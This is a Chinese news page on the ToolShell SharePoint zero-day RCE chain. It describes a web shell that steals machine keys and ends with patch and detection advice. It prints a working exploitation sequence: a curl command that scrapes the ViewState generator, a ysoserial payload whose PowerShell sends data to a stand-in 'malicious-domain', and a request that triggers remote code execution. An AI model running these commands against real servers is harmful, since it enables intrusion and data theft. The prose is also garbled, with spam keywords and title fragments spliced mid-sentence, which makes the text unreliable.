您现在的位置是:人工智能 >>正文
工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链
人工智能114人已围观
简介图片来源:CODE WHITE GmbH2025年7月18日晚间,Eye Security安全团队发现一起大规模利用新型Microsoft SharePoint远程代码执行RCE)漏洞链的攻击活动,该 ...

图片来源:CODE WHITE GmbH
2025年7月18日晚间 ,工具攻击Eye Security安全团队发现一起大规模利用新型Microsoft SharePoint远程代码执行(RCE)漏洞链的链漏链攻击活动 ,该漏洞链被命名为ToolShell。洞预的攻击者通过组合利用CVE-2025-49704和CVE-2025-49706两个漏洞,警全可在无需认证的球活情况下完全控制本地部署的SharePoint服务器。
"这并非凭证泄露问题,跃利用中而是高防服务器新型零已被武器化的Pwn2Own漏洞利用代码在野利用" ,Eye Security特别强调。工具攻击
漏洞技术细节ToolShell攻击链包含两个关键漏洞:
CVE-2025-49706(CVSS 6.3):SharePoint服务器欺骗漏洞CVE-2025-49704(CVSS 8.8):通过ToolPane端点触发的链漏链SharePoint RCE漏洞初步分析认为攻击需要有效凭证,但深入调查显示实际无需任何认证。洞预的报告指出:"对/_layouts/15/ToolPane.aspx的警全POST请求特征非常明显...我们确信攻击全程未使用任何凭证"。
攻击手法分析攻击基于Code White GmbH曾在Pwn2Own上演示的模板下载球活概念验证代码 ,现已被完全武器化。跃利用中成功利用后 ,新型零攻击者可直接植入隐蔽的工具攻击ASPX恶意负载而无需登录 。已观测到的恶意文件spinstall0.aspx疑似基于Sharpyshell开发 ,其设计目的并非直接执行命令,而是源码库窃取加密机器密钥 。
"这不是典型的网页后门...该页面通过调用.NET内部方法读取SharePoint服务器的MachineKey配置",研究人员解释。这些密钥(如ValidationKey和DecryptionKey)用于生成有效的__VIEWSTATE令牌——这是ASP.NET的核心安全机制 。服务器租用获取密钥后 ,攻击者可使用ysoserial等工具签署恶意负载实现完全远程代码执行 。
复制# 通过任意公开SharePoint页面获取<VIEWSTATE_GENERATOR> curl -s https://target/_layouts/15/start.aspx | grep -oP __VIEWSTATEGENERATOR" value="\K[^"]+ # 生成viewstate攻击负载示例 ysoserial.exe -p ViewState -g TypeConfuseDelegate \ -c "powershell -nop -c \"dir C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS | % { Invoke-WebRequest -Uri (http://malicious-domain/?f= + [uri]::EscapeDataString($_.Name)) }\"" \ --generator="<VIEWSTATE_GENERATOR>" \ --validationkey="<VALIDATION_KEY>" \ --validationalg="<VALIDATION_ALG>" \ --islegacy \ --minify # 将生成的令牌附加至请求即可执行命令(RCE) curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>1.2.3.4.5.6.7.8.9.10.11.12.13.14."这些负载可嵌入任意恶意命令 ,并被服务器视为可信输入,最终在无需凭证的情况下完成RCE攻击链",报告补充道。
影响范围与响应措施Eye Security扫描了8,000余台暴露在公网的SharePoint服务器 ,源码下载发现数十台已遭入侵。通过分析160字节的独特响应特征和spinstall0.aspx端点可识别受影响系统。
截至7月19日,Palo Alto Networks Unit 42确认攻击仍在持续 ,观测到攻击者 :
通过PowerShell投放恶意ASPX负载窃取机器密钥建立持久化访问从可疑IP(如96[.]9[.]125[.]147)执行攻击模块微软已发布紧急补丁和安全指南 ,建议本地部署SharePoint的用户立即采取以下措施:
安装7月补丁星期二发布的最新SharePoint更新扫描入侵痕迹,重点检查/ToolPane.aspx和/spinstall0.aspx路径检查加密密钥是香港云服务器否泄露 ,如已失窃需立即重新生成监控HTTP(S)外联连接和反向Shell活动Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/news/207f499788.html
相关文章
TikTok 零日漏洞被利用,可一键劫持高级账户
人工智能近日,攻击者利用社交媒体直接消息功能中的零日漏洞,劫持了多家知名公司和人物的TikTok 账户。TikTok发言人证实,索尼、希尔顿、美国有线电视新闻网(CNN)等用户的账户已遭到黑客劫持,为了防止被 ...
【人工智能】
阅读更多数据保护需要基于AI的安全策略
人工智能只有一半的受访者表示,他们企业的数据安全战略跟上了AI的发展速度。此外,尽管AI最近蓬勃发展,在2024年,实施更强大的数据治理和安全控制将是数据团队的更高优先事项。数据治理在企业的计划中占据重要位置 ...
【人工智能】
阅读更多保护家庭网络的九种推荐方法
人工智能家庭网络是通往数字世界的门户,连接所有设备并实现无缝通信和互联网访问。然而,保护家庭网络免受潜在威胁,对于保护敏感信息和确保安全的在线体验至关重要。在这篇文章中,我们列出了九种简单有效的方法来保护家庭 ...
【人工智能】
阅读更多
热门文章
最新文章
友情链接
- 探索Nowallprime的性(无墙壁体验的未来——Nowallprime的突破性创新)
- 开博尔Q1(探索开博尔Q1的性能、安全和可靠性,让你爱上电动出行)
- 优沃IWM智能体重管理系统——轻松掌控健康(健康管理新利器——优沃IWM帮你实现身体管理的新高度)
- 海尔电视品牌的质量与口碑如何?(揭秘海尔电视品牌的关键优势和用户评价)
- 华硕笔记本UEFI重装系统教程(一步步教你如何使用华硕笔记本的UEFI功能来重装系统)
- 如何更换联想Ideapad720s键盘(简单、快速、有效,轻松替换您的键盘)
- U盘装64位系统教程(使用U盘轻松安装64位操作系统)
- 小米Note2(小米Note2在市场上受到广泛关注,销量持续飙升)
- 红米2自动接听如何设置
- 以讯景R7265显卡的性能和特点详解(高性价比的显卡选择,探究以讯景R7265的强大性能与独特特点) 亿华云香港物理机b2b信息平台企业服务器源码库云服务器网站建设